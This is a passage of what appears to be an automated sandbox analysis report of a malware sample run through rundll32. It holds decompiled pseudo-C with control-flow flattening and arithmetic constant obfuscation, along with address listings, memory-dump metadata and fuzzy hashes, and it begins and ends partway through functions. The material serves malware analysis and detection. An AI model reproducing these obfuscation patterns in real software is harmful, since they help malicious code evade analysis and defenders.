										_t552 = _t554 + 2;
										_t499 = 0x9c63280;
										continue;
									} else {
										if(_t499 == 0x7e93d80) {
											_t567 = E00371CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
											_t568 =  &(_t568[0x13]);
											__eflags = _t567;
											if(_t567 == 0) {
												L19:
												_t499 = 0xfa48365;
												_t539 = 0x5c;
												continue;
											} else {
												_t499 = 0xacc4ac0;
												_v1596 = 1;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											}
										} else {
											if(_t499 == 0x9b91574) {
												_push(_v1624);
												_push(_v1684);
												_push(_v1712);
												_push( &_v1560);
												E003846BB(_v1744, _v1584);
												_t568 = _t568 - 0xc + 0x1c;
												_t499 = 0xf66352a;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											} else {
												if(_t499 != 0x9c63280) {
													goto L27;
                                                                                                                                                            												} else {
                                                                                                                                                            													_t496 = E0037912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
                                                                                                                                                            													_t498 = _t496;
                                                                                                                                                            													_t568 =  &(_t568[5]);
                                                                                                                                                            													if(_t496 != 0) {
                                                                                                                                                            														_t499 = 0x7e93d80;
                                                                                                                                                            														while(1) {
                                                                                                                                                            															_t539 = 0x5c;
                                                                                                                                                            															goto L3;
                                                                                                                                                            														}
                                                                                                                                                            													}
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            								L24:
                                                                                                                                                            								return _v1596;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t499 - 0xacc4ac0;
                                                                                                                                                            							if(_t499 == 0xacc4ac0) {
                                                                                                                                                            								E0037D6D8(_t567, _v1708, _t498, _v1628, _v1716);
                                                                                                                                                            								_t568 =  &(_t568[4]);
                                                                                                                                                            								_t499 = 0xa8fcf9f;
                                                                                                                                                            								_t539 = 0x5c;
                                                                                                                                                            								goto L27;
                                                                                                                                                            							} else {
                                                                                                                                                            								__eflags = _t499 - 0xf66352a;
                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                            									_push(_v1592);
                                                                                                                                                            									_push(_v1732);
                                                                                                                                                            									_t481 = E0038DCF7(_v1616, 0x371020, __eflags);
                                                                                                                                                            									E0038176B( &_v1040, __eflags);
                                                                                                                                                            									_t503 =  *0x393e10; // 0x0
                                                                                                                                                            									_t431 = _t503 + 0x1c; // 0x1c
                                                                                                                                                            									_t432 = _t503 + 0x23c; // 0x23c
                                                                                                                                                            									E00381652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
                                                                                                                                                            									E0037A8B0(_v1636, _t481, _v1664);
                                                                                                                                                            									_t568 =  &(_t568[0xf]);
                                                                                                                                                            									_t499 = 0x4b40ba0;
                                                                                                                                                            									goto L1;
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _t499 - 0xfa48365;
                                                                                                                                                            									if(_t499 != 0xfa48365) {
                                                                                                                                                            										goto L27;
                                                                                                                                                            									} else {
                                                                                                                                                            										E00388F9E(_v1604, _v1656, _v1612, _v1620, _t498);
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							goto L24;
                                                                                                                                                            							L27:
                                                                                                                                                            							__eflags = _t499 - 0xd334e0e;
                                                                                                                                                            						} while (_t499 != 0xd334e0e);
                                                                                                                                                            						goto L24;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}

                                                                                                                                                            0x00386105
                                                                                                                                                            0x00386110
                                                                                                                                                            0x00386118
                                                                                                                                                            0x00386120
                                                                                                                                                            0x00386128
                                                                                                                                                            0x00386130
                                                                                                                                                            0x00386138
                                                                                                                                                            0x00386140
                                                                                                                                                            0x00386145
                                                                                                                                                            0x0038614d
                                                                                                                                                            0x00386155
                                                                                                                                                            0x0038615d
                                                                                                                                                            0x0038616a
                                                                                                                                                            0x0038616e
                                                                                                                                                            0x00386176
                                                                                                                                                            0x0038617e
                                                                                                                                                            0x00386186
                                                                                                                                                            0x00386191
                                                                                                                                                            0x0038619c
                                                                                                                                                            0x003861a7
                                                                                                                                                            0x003861af
                                                                                                                                                            0x003861b7
                                                                                                                                                            0x003861bf
                                                                                                                                                            0x003861c7
                                                                                                                                                            0x003861cf
                                                                                                                                                            0x003861da
                                                                                                                                                            0x003861e2
                                                                                                                                                            0x003861ed
                                                                                                                                                            0x003861f5
                                                                                                                                                            0x003861fd
                                                                                                                                                            0x00386202
                                                                                                                                                            0x0038620a
                                                                                                                                                            0x00386212
                                                                                                                                                            0x0038621a
                                                                                                                                                            0x00386224
                                                                                                                                                            0x00386228
                                                                                                                                                            0x0038622d
                                                                                                                                                            0x00386235
                                                                                                                                                            0x00386240
                                                                                                                                                            0x0038624b
                                                                                                                                                            0x00386256
                                                                                                                                                            0x0038625e
                                                                                                                                                            0x0038626e
                                                                                                                                                            0x00386272
                                                                                                                                                            0x00386277
                                                                                                                                                            0x0038627f
                                                                                                                                                            0x0038628b
                                                                                                                                                            0x0038628e
                                                                                                                                                            0x00386297
                                                                                                                                                            0x0038629b
                                                                                                                                                            0x003862a3
                                                                                                                                                            0x003862ab
                                                                                                                                                            0x003862b5
                                                                                                                                                            0x003862bd
                                                                                                                                                            0x003862c5
                                                                                                                                                            0x003862d0
                                                                                                                                                            0x003862db
                                                                                                                                                            0x003862e6
                                                                                                                                                            0x003862ee
                                                                                                                                                            0x003862f6
                                                                                                                                                            0x003862fe
                                                                                                                                                            0x00386306
                                                                                                                                                            0x0038631b
                                                                                                                                                            0x0038631c
                                                                                                                                                            0x00386323
                                                                                                                                                            0x0038632a
                                                                                                                                                            0x00386331
                                                                                                                                                            0x0038633c
                                                                                                                                                            0x00386344
                                                                                                                                                            0x0038634f
                                                                                                                                                            0x00386356
                                                                                                                                                            0x0038635a
                                                                                                                                                            0x00386362
                                                                                                                                                            0x0038636d
                                                                                                                                                            0x00386378
                                                                                                                                                            0x00386383
                                                                                                                                                            0x0038638e
                                                                                                                                                            0x00386396
                                                                                                                                                            0x003863a1
                                                                                                                                                            0x003863a1
                                                                                                                                                            0x003863a6
                                                                                                                                                            0x003863a8
                                                                                                                                                            0x003863a9
                                                                                                                                                            0x003863a9
                                                                                                                                                            0x003863a9
                                                                                                                                                            0x003863a9
                                                                                                                                                            0x003863ab
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003863b1
                                                                                                                                                            0x003864ef
                                                                                                                                                            0x003864f4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003863b7
                                                                                                                                                            0x003863bd
                                                                                                                                                            0x003864bb
                                                                                                                                                            0x003864c1
                                                                                                                                                            0x003864c9
                                                                                                                                                            0x003864c9
                                                                                                                                                            0x003864cc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003864c6
                                                                                                                                                            0x003864c6
                                                                                                                                                            0x003864c6
                                                                                                                                                            0x003864ce
                                                                                                                                                            0x003864d1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003863c3
                                                                                                                                                            0x003863c9
                                                                                                                                                            0x0038649d
                                                                                                                                                            0x0038649f
                                                                                                                                                            0x003864a2
                                                                                                                                                            0x003864a4
                                                                                                                                                            0x003864f7
                                                                                                                                                            0x003864f7
                                                                                                                                                            0x003863a8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003864a6
                                                                                                                                                            0x003864a6
                                                                                                                                                            0x003864ab
                                                                                                                                                            0x003863a6
                                                                                                                                                            0x003863a8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003863a8
                                                                                                                                                            0x003863a6
                                                                                                                                                            0x003863cb
                                                                                                                                                            0x003863d1
                                                                                                                                                            0x00386411
                                                                                                                                                            0x0038641f
                                                                                                                                                            0x00386423
                                                                                                                                                            0x00386435
                                                                                                                                                            0x00386436
                                                                                                                                                            0x0038643b
                                                                                                                                                            0x0038643e
                                                                                                                                                            0x003863a6
                                                                                                                                                            0x003863a8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003863a8
                                                                                                                                                            0x003863d3
                                                                                                                                                            0x003863d9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003863df
                                                                                                                                                            0x003863f8
                                                                                                                                                            0x003863fd
                                                                                                                                                            0x003863ff
                                                                                                                                                            0x00386404
                                                                                                                                                            0x0038640a
                                                                                                                                                            0x003863a6
                                                                                                                                                            0x003863a8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003863a8
                                                                                                                                                            0x003863a6
                                                                                                                                                            0x00386404
                                                                                                                                                            0x003863d9
                                                                                                                                                            0x003863d1
                                                                                                                                                            0x003863c9
                                                                                                                                                            0x003863bd
                                                                                                                                                            0x00386546
                                                                                                                                                            0x00386557
                                                                                                                                                            0x00386557
                                                                                                                                                            0x00386501
                                                                                                                                                            0x00386507
                                                                                                                                                            0x00386619
                                                                                                                                                            0x0038661e
                                                                                                                                                            0x00386621
                                                                                                                                                            0x00386625
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                                                            • API String ID: 0-2231434368
                                                                                                                                                            • Opcode ID: a147d0edde1d66fda555c9a7ea788432cbaed659a4e4527f80a912fd640ab6f8
                                                                                                                                                            • Instruction ID: bcbf3f86e1b19bb968067f15e57d98051ae3e9f8dc9d613687d0e87bd7b2863a
                                                                                                                                                            • Opcode Fuzzy Hash: a147d0edde1d66fda555c9a7ea788432cbaed659a4e4527f80a912fd640ab6f8
                                                                                                                                                            • Instruction Fuzzy Hash: 50224171508380DFD369CF65C98AA9BFBE2FBC4744F10891DE29A86260D7B58949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E00386DF8(void* __ecx) {
                                                                                                                                                            				char _v524;
                                                                                                                                                            				char _v1044;
                                                                                                                                                            				char _v1564;
                                                                                                                                                            				short _v1568;
                                                                                                                                                            				short _v1572;
                                                                                                                                                            				intOrPtr _v1576;
                                                                                                                                                            				intOrPtr _v1580;
                                                                                                                                                            				intOrPtr _v1592;
                                                                                                                                                            				char _v1596;
                                                                                                                                                            				char _v1600;
                                                                                                                                                            				signed int _v1604;
                                                                                                                                                            				signed int _v1608;
                                                                                                                                                            				signed int _v1612;
                                                                                                                                                            				signed int _v1616;
                                                                                                                                                            				signed int _v1620;
                                                                                                                                                            				signed int _v1624;
                                                                                                                                                            				signed int _v1628;
                                                                                                                                                            				signed int _v1632;
                                                                                                                                                            				signed int _v1636;
                                                                                                                                                            				signed int _v1640;
                                                                                                                                                            				signed int _v1644;
                                                                                                                                                            				signed int _v1648;
                                                                                                                                                            				signed int _v1652;
                                                                                                                                                            				signed int _v1656;
                                                                                                                                                            				signed int _v1660;
                                                                                                                                                            				signed int _v1664;
                                                                                                                                                            				signed int _v1668;
                                                                                                                                                            				signed int _v1672;
                                                                                                                                                            				signed int _v1676;
                                                                                                                                                            				signed int _v1680;
                                                                                                                                                            				signed int _v1684;
                                                                                                                                                            				signed int _v1688;
                                                                                                                                                            				signed int _v1692;
                                                                                                                                                            				signed int _v1696;
                                                                                                                                                            				signed int _v1700;
                                                                                                                                                            				signed int _v1704;
                                                                                                                                                            				signed int _v1708;
                                                                                                                                                            				signed int _v1712;
                                                                                                                                                            				signed int _v1716;
                                                                                                                                                            				signed int _v1720;
                                                                                                                                                            				signed int _v1724;
                                                                                                                                                            				signed int _v1728;
                                                                                                                                                            				signed int _v1732;
                                                                                                                                                            				signed int _v1736;
                                                                                                                                                            				signed int _v1740;
                                                                                                                                                            				signed int _v1744;
                                                                                                                                                            				signed int _v1748;
                                                                                                                                                            				signed int _v1752;
                                                                                                                                                            				signed int _v1756;
                                                                                                                                                            				signed int _v1760;
                                                                                                                                                            				signed int _v1764;
                                                                                                                                                            				signed int _v1768;
                                                                                                                                                            				signed int _v1772;
                                                                                                                                                            				signed int _v1776;
                                                                                                                                                            				signed int _v1780;
                                                                                                                                                            				signed int _v1784;
                                                                                                                                                            				signed int _v1788;
                                                                                                                                                            				signed int _v1792;
                                                                                                                                                            				signed int _v1796;
                                                                                                                                                            				signed int _v1800;
                                                                                                                                                            				signed int _v1804;
                                                                                                                                                            				signed int _v1808;
                                                                                                                                                            				signed int _v1812;
                                                                                                                                                            				signed int _v1816;
                                                                                                                                                            				signed int _v1820;
                                                                                                                                                            				signed int _v1824;
                                                                                                                                                            				signed int _v1828;
                                                                                                                                                            				signed int _v1832;
                                                                                                                                                            				signed int _v1836;
                                                                                                                                                            				signed int _v1840;
                                                                                                                                                            				signed int _v1844;
                                                                                                                                                            				void* _t583;
                                                                                                                                                            				void* _t585;
                                                                                                                                                            				void* _t592;
                                                                                                                                                            				void* _t603;
                                                                                                                                                            				void* _t606;
                                                                                                                                                            				void* _t609;
                                                                                                                                                            				signed int _t611;
                                                                                                                                                            				signed int _t612;
                                                                                                                                                            				signed int _t613;
                                                                                                                                                            				signed int _t614;
                                                                                                                                                            				signed int _t615;
                                                                                                                                                            				signed int _t616;
                                                                                                                                                            				signed int _t617;
                                                                                                                                                            				signed int _t618;
                                                                                                                                                            				signed int _t619;
                                                                                                                                                            				void* _t620;
                                                                                                                                                            				signed int _t674;
                                                                                                                                                            				char _t675;
                                                                                                                                                            				void* _t677;
                                                                                                                                                            				signed int* _t682;
                                                                                                                                                            
                                                                                                                                                            				_t682 =  &_v1844;
                                                                                                                                                            				_v1580 = 0x812dcc;
                                                                                                                                                            				_v1600 = 0;
                                                                                                                                                            				_v1572 = 0;
                                                                                                                                                            				_v1568 = 0;
                                                                                                                                                            				_v1576 = 0x4b1be1;
                                                                                                                                                            				_v1604 = 0xb0e9fc;
                                                                                                                                                            				_v1604 = _v1604 >> 0xe;
                                                                                                                                                            				_v1604 = _v1604 ^ 0x020002c3;
                                                                                                                                                            				_v1816 = 0x316963;
                                                                                                                                                            				_v1816 = _v1816 ^ 0x05c37e76;
                                                                                                                                                            				_v1816 = _v1816 * 0x44;
                                                                                                                                                            				_t609 = __ecx;
                                                                                                                                                            				_v1816 = _v1816 << 6;
                                                                                                                                                            				_t677 = 0xb42e112;
                                                                                                                                                            				_v1816 = _v1816 ^ 0x13878f70;
                                                                                                                                                            				_v1648 = 0xe65aa1;
                                                                                                                                                            				_v1648 = _v1648 + 0xffffb7c7;
                                                                                                                                                            				_v1648 = _v1648 ^ 0x00e866e0;
                                                                                                                                                            				_v1608 = 0x4e6d43;
                                                                                                                                                            				_v1608 = _v1608 << 3;
                                                                                                                                                            				_v1608 = _v1608 ^ 0x027e4d7c;
                                                                                                                                                            				_v1792 = 0x62c447;
                                                                                                                                                            				_v1792 = _v1792 + 0xfffff9b0;
                                                                                                                                                            				_v1792 = _v1792 + 0xffff1ab6;
                                                                                                                                                            				_v1792 = _v1792 ^ 0x5826ec20;
                                                                                                                                                            				_v1792 = _v1792 ^ 0x58465e47;
                                                                                                                                                            				_v1616 = 0xd881ce;
                                                                                                                                                            				_t611 = 0x1c;
                                                                                                                                                            				_v1616 = _v1616 / _t611;
                                                                                                                                                            				_v1616 = _v1616 ^ 0x00049a8c;
                                                                                                                                                            				_v1784 = 0x225701;
                                                                                                                                                            				_v1784 = _v1784 ^ 0x455f73cc;
                                                                                                                                                            				_v1784 = _v1784 + 0x2d0b;
                                                                                                                                                            				_v1784 = _v1784 + 0xffff7069;
                                                                                                                                                            				_v1784 = _v1784 ^ 0x457ed570;
                                                                                                                                                            				_v1656 = 0xa0746c;
                                                                                                                                                            				_v1656 = _v1656 << 5;
                                                                                                                                                            				_v1656 = _v1656 ^ 0x1405cb88;
                                                                                                                                                            				_v1756 = 0x86f3a;
                                                                                                                                                            				_v1756 = _v1756 << 0xf;
                                                                                                                                                            				_v1756 = _v1756 + 0xffff9aa0;
                                                                                                                                                            				_v1756 = _v1756 ^ 0x379e88f8;
                                                                                                                                                            				_v1840 = 0x372205;
                                                                                                                                                            				_v1840 = _v1840 << 0xb;
                                                                                                                                                            				_v1840 = _v1840 >> 1;
                                                                                                                                                            				_t612 = 0x47;
                                                                                                                                                            				_v1840 = _v1840 * 0x27;
                                                                                                                                                            				_v1840 = _v1840 ^ 0x18b0e4c5;
                                                                                                                                                            				_v1720 = 0x55473e;
                                                                                                                                                            				_v1720 = _v1720 >> 0xe;
                                                                                                                                                            				_v1720 = _v1720 + 0xffff4222;
                                                                                                                                                            				_v1720 = _v1720 ^ 0xfff7d1f7;
                                                                                                                                                            				_v1760 = 0x8a22d4;
                                                                                                                                                            				_v1760 = _v1760 ^ 0x5338d916;
                                                                                                                                                            				_v1760 = _v1760 / _t612;
                                                                                                                                                            				_v1760 = _v1760 ^ 0x01221ec9;
                                                                                                                                                            				_v1716 = 0x7ad7ec;
                                                                                                                                                            				_v1716 = _v1716 ^ 0xb2734e10;
                                                                                                                                                            				_v1716 = _v1716 ^ 0xf628ba0e;
                                                                                                                                                            				_v1716 = _v1716 ^ 0x44287105;
                                                                                                                                                            				_v1624 = 0x6426f4;
                                                                                                                                                            				_v1624 = _v1624 * 0x29;
                                                                                                                                                            				_v1624 = _v1624 ^ 0x100ef306;
                                                                                                                                                            				_v1728 = 0x3e505e;
                                                                                                                                                            				_v1728 = _v1728 >> 8;
                                                                                                                                                            				_t613 = 0x3a;
                                                                                                                                                            				_v1728 = _v1728 / _t613;
                                                                                                                                                            				_v1728 = _v1728 ^ 0x00050efb;
                                                                                                                                                            				_v1752 = 0x3958e2;
                                                                                                                                                            				_v1752 = _v1752 ^ 0x62ae6d50;
                                                                                                                                                            				_v1752 = _v1752 ^ 0x97f7befb;
                                                                                                                                                            				_v1752 = _v1752 ^ 0xf561088c;
                                                                                                                                                            				_v1688 = 0xb21a91;
                                                                                                                                                            				_v1688 = _v1688 ^ 0x7ffc0397;
                                                                                                                                                            				_v1688 = _v1688 ^ 0x7f439e8f;
                                                                                                                                                            				_v1620 = 0xd8d2d1;
                                                                                                                                                            				_v1620 = _v1620 + 0x194e;
                                                                                                                                                            				_v1620 = _v1620 ^ 0x00d523c5;
                                                                                                                                                            				_v1696 = 0xa820cb;
                                                                                                                                                            				_v1696 = _v1696 + 0x8b3c;
                                                                                                                                                            				_v1696 = _v1696 ^ 0x00a28581;
                                                                                                                                                            				_v1680 = 0x121bc4;
                                                                                                                                                            				_t674 = 0x7a;
                                                                                                                                                            				_v1680 = _v1680 / _t674;
                                                                                                                                                            				_v1680 = _v1680 ^ 0x0006e996;
                                                                                                                                                            				_v1744 = 0x9924c6;
                                                                                                                                                            				_v1744 = _v1744 << 4;
                                                                                                                                                            				_t614 = 0x11;
                                                                                                                                                            				_v1744 = _v1744 * 0x36;
                                                                                                                                                            				_v1744 = _v1744 ^ 0x04d385a1;
                                                                                                                                                            				_v1632 = 0x653a8;
                                                                                                                                                            				_v1632 = _v1632 * 0x63;
                                                                                                                                                            				_v1632 = _v1632 ^ 0x027c9a7f;
                                                                                                                                                            				_v1672 = 0x158278;
                                                                                                                                                            				_v1672 = _v1672 + 0xffff088d;
                                                                                                                                                            				_v1672 = _v1672 ^ 0x001491ab;
                                                                                                                                                            				_v1832 = 0x486b88;
                                                                                                                                                            				_v1832 = _v1832 + 0xffff9f3d;
                                                                                                                                                            				_v1832 = _v1832 >> 3;
                                                                                                                                                            				_v1832 = _v1832 | 0x023d4c2b;
                                                                                                                                                            				_v1832 = _v1832 ^ 0x0230cd37;
                                                                                                                                                            				_v1612 = 0xd2c4ef;
                                                                                                                                                            				_v1612 = _v1612 * 0x5a;
                                                                                                                                                            				_v1612 = _v1612 ^ 0x4a177333;
                                                                                                                                                            				_v1776 = 0x829598;
                                                                                                                                                            				_v1776 = _v1776 << 0xe;
                                                                                                                                                            				_v1776 = _v1776 >> 2;
                                                                                                                                                            				_v1776 = _v1776 | 0x8c8c5501;
                                                                                                                                                            				_v1776 = _v1776 ^ 0xaddb19b6;
                                                                                                                                                            				_v1712 = 0x169d18;
                                                                                                                                                            				_v1712 = _v1712 / _t614;
                                                                                                                                                            				_v1712 = _v1712 >> 0xa;
                                                                                                                                                            				_v1712 = _v1712 ^ 0x000c26db;
                                                                                                                                                            				_v1704 = 0xb2b50;
                                                                                                                                                            				_v1704 = _v1704 ^ 0x2de07b8f;
                                                                                                                                                            				_v1704 = _v1704 ^ 0x2de0ad86;
                                                                                                                                                            				_v1800 = 0x9652d5;
                                                                                                                                                            				_t615 = 3;
                                                                                                                                                            				_v1800 = _v1800 * 0x68;
                                                                                                                                                            				_v1800 = _v1800 / _t615;
                                                                                                                                                            				_v1800 = _v1800 << 0xa;
                                                                                                                                                            				_v1800 = _v1800 ^ 0x6cd74e85;
                                                                                                                                                            				_v1664 = 0x74acab;
                                                                                                                                                            				_v1664 = _v1664 | 0xe18c4dd2;
                                                                                                                                                            				_v1664 = _v1664 ^ 0xe1f0b032;
                                                                                                                                                            				_v1824 = 0x58e83b;
                                                                                                                                                            				_t616 = 0x2c;
                                                                                                                                                            				_v1824 = _v1824 * 0x2b;
                                                                                                                                                            				_v1824 = _v1824 + 0xffff56af;
                                                                                                                                                            				_v1824 = _v1824 ^ 0x0c61ca29;
                                                                                                                                                            				_v1824 = _v1824 ^ 0x02809c1e;
                                                                                                                                                            				_v1764 = 0x974237;
                                                                                                                                                            				_v1764 = _v1764 << 0xb;
                                                                                                                                                            				_v1764 = _v1764 * 0x31;
                                                                                                                                                            				_v1764 = _v1764 ^ 0x9d674e65;
                                                                                                                                                            				_v1736 = 0xc3f98b;
                                                                                                                                                            				_v1736 = _v1736 * 0x5e;
                                                                                                                                                            				_v1736 = _v1736 | 0x641bd8e3;
                                                                                                                                                            				_v1736 = _v1736 ^ 0x67f85735;
                                                                                                                                                            				_v1700 = 0xe4f15c;
                                                                                                                                                            				_v1700 = _v1700 | 0xddaa88b0;
                                                                                                                                                            				_v1700 = _v1700 ^ 0xdde3c6d3;
                                                                                                                                                            				_v1844 = 0x9b3502;
                                                                                                                                                            				_v1844 = _v1844 ^ 0x47d60286;
                                                                                                                                                            				_v1844 = _v1844 / _t616;
                                                                                                                                                            				_v1844 = _v1844 ^ 0x0193d551;
                                                                                                                                                            				_v1640 = 0xffe1b1;
                                                                                                                                                            				_t617 = 0x39;
                                                                                                                                                            				_v1640 = _v1640 * 0x7b;
                                                                                                                                                            				_v1640 = _v1640 ^ 0x7af2e2c5;
                                                                                                                                                            				_v1808 = 0x2876e6;
                                                                                                                                                            				_v1808 = _v1808 | 0x109585e0;
                                                                                                                                                            				_v1808 = _v1808 << 0xd;
                                                                                                                                                            				_v1808 = _v1808 + 0x9cd3;
                                                                                                                                                            				_v1808 = _v1808 ^ 0xbefbba98;
                                                                                                                                                            				_v1676 = 0xd3b2e1;
                                                                                                                                                            				_v1676 = _v1676 << 0xf;
                                                                                                                                                            				_v1676 = _v1676 ^ 0xd9748eec;
                                                                                                                                                            				_v1836 = 0x3e007f;
                                                                                                                                                            				_v1836 = _v1836 + 0xffffe462;
                                                                                                                                                            				_v1836 = _v1836 >> 9;
                                                                                                                                                            				_v1836 = _v1836 >> 6;
                                                                                                                                                            				_v1836 = _v1836 ^ 0x000afa23;
                                                                                                                                                            				_v1684 = 0x2c402;
                                                                                                                                                            				_v1684 = _v1684 >> 0xa;
                                                                                                                                                            				_v1684 = _v1684 ^ 0x0000130c;
                                                                                                                                                            				_v1692 = 0x94252b;
                                                                                                                                                            				_v1692 = _v1692 / _t617;
                                                                                                                                                            				_v1692 = _v1692 ^ 0x000dcb04;
                                                                                                                                                            				_v1828 = 0xd5c7f6;
                                                                                                                                                            				_v1828 = _v1828 * 0x41;
                                                                                                                                                            				_v1828 = _v1828 + 0x5616;
                                                                                                                                                            				_v1828 = _v1828 >> 9;
                                                                                                                                                            				_v1828 = _v1828 ^ 0x001e39c7;
                                                                                                                                                            				_v1740 = 0xceff06;
                                                                                                                                                            				_v1740 = _v1740 << 0xe;
                                                                                                                                                            				_v1740 = _v1740 << 8;
                                                                                                                                                            				_v1740 = _v1740 ^ 0xc18fb5bb;
                                                                                                                                                            				_v1748 = 0x414330;
                                                                                                                                                            				_v1748 = _v1748 * 0x1d;
                                                                                                                                                            				_v1748 = _v1748 | 0x5a6f0d55;
                                                                                                                                                            				_v1748 = _v1748 ^ 0x5f6ea92a;
                                                                                                                                                            				_v1668 = 0xd2b255;
                                                                                                                                                            				_v1668 = _v1668 ^ 0xc5d7949e;
                                                                                                                                                            				_v1668 = _v1668 ^ 0xc50ba027;
                                                                                                                                                            				_v1796 = 0xab825d;
                                                                                                                                                            				_v1796 = _v1796 << 0xc;
                                                                                                                                                            				_v1796 = _v1796 + 0xd01b;
                                                                                                                                                            				_t618 = 0x22;
                                                                                                                                                            				_v1796 = _v1796 / _t618;
                                                                                                                                                            				_v1796 = _v1796 ^ 0x056bf222;
                                                                                                                                                            				_v1724 = 0x6f3f31;
                                                                                                                                                            				_v1724 = _v1724 + 0x5a62;
                                                                                                                                                            				_v1724 = _v1724 / _t674;
                                                                                                                                                            				_v1724 = _v1724 ^ 0x0002d040;
                                                                                                                                                            				_v1652 = 0x230f16;
                                                                                                                                                            				_v1652 = _v1652 ^ 0x902061d9;
                                                                                                                                                            				_v1652 = _v1652 ^ 0x9007a9ef;
                                                                                                                                                            				_v1804 = 0xb250d0;
                                                                                                                                                            				_v1804 = _v1804 << 7;
                                                                                                                                                            				_v1804 = _v1804 << 0xe;
                                                                                                                                                            				_v1804 = _v1804 >> 0x10;
                                                                                                                                                            				_v1804 = _v1804 ^ 0x000e0b76;
                                                                                                                                                            				_v1644 = 0x39b2ec;
                                                                                                                                                            				_v1644 = _v1644 >> 5;
                                                                                                                                                            				_v1644 = _v1644 ^ 0x0004ae9a;
                                                                                                                                                            				_v1708 = 0x41b5f8;
                                                                                                                                                            				_v1708 = _v1708 << 9;
                                                                                                                                                            				_v1708 = _v1708 + 0xfffffd74;
                                                                                                                                                            				_v1708 = _v1708 ^ 0x836650ae;
                                                                                                                                                            				_v1768 = 0xd924a5;
                                                                                                                                                            				_t619 = 0x26;
                                                                                                                                                            				_v1768 = _v1768 * 0x57;
                                                                                                                                                            				_v1768 = _v1768 >> 4;
                                                                                                                                                            				_v1768 = _v1768 ^ 0x04932b37;
                                                                                                                                                            				_v1788 = 0x72a9d;
                                                                                                                                                            				_v1788 = _v1788 >> 0xb;
                                                                                                                                                            				_v1788 = _v1788 * 0x3f;
                                                                                                                                                            				_v1788 = _v1788 + 0xffffc8d5;
                                                                                                                                                            				_v1788 = _v1788 ^ 0x000eb520;
                                                                                                                                                            				_v1628 = 0x50edf9;
                                                                                                                                                            				_v1628 = _v1628 * 0x73;
                                                                                                                                                            				_v1628 = _v1628 ^ 0x245d5801;
                                                                                                                                                            				_v1772 = 0x77fe3c;
                                                                                                                                                            				_v1772 = _v1772 + 0x89a9;
                                                                                                                                                            				_v1772 = _v1772 | 0x772eb6e7;
                                                                                                                                                            				_v1772 = _v1772 + 0xffffc435;
                                                                                                                                                            				_v1772 = _v1772 ^ 0x777a10e8;
                                                                                                                                                            				_v1780 = 0x481950;
                                                                                                                                                            				_v1780 = _v1780 >> 0xb;
                                                                                                                                                            				_v1780 = _v1780 | 0x104efd63;
                                                                                                                                                            				_v1780 = _v1780 + 0xffffd02c;
                                                                                                                                                            				_v1780 = _v1780 ^ 0x1043876c;
                                                                                                                                                            				_v1636 = 0x899427;
                                                                                                                                                            				_v1636 = _v1636 << 0x10;
                                                                                                                                                            				_v1636 = _v1636 ^ 0x942ef0bd;
                                                                                                                                                            				_v1812 = 0xafb495;
                                                                                                                                                            				_v1812 = _v1812 | 0xf73eef3e;
                                                                                                                                                            				_v1812 = _v1812 + 0xffffb280;
                                                                                                                                                            				_v1812 = _v1812 ^ 0xf7b4985a;
                                                                                                                                                            				_v1732 = 0xe6dab0;
                                                                                                                                                            				_v1732 = _v1732 + 0x38b;
                                                                                                                                                            				_v1732 = _v1732 | 0x5f912f35;
                                                                                                                                                            				_v1732 = _v1732 ^ 0x5ff91c81;
                                                                                                                                                            				_v1660 = 0xa1ff8d;
                                                                                                                                                            				_v1660 = _v1660 / _t619;
                                                                                                                                                            				_v1660 = _v1660 ^ 0x000a69c5;
                                                                                                                                                            				_v1820 = 0xd15a88;
                                                                                                                                                            				_v1820 = _v1820 ^ 0xcd50b9e8;
                                                                                                                                                            				_v1820 = _v1820 >> 0x10;
                                                                                                                                                            				_v1820 = _v1820 ^ 0xf9319330;
                                                                                                                                                            				_v1820 = _v1820 ^ 0xf933c487;
                                                                                                                                                            				_t675 = _v1600;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L2:
                                                                                                                                                            						_t620 = 0x424d9d2;
                                                                                                                                                            						do {
                                                                                                                                                            							L3:
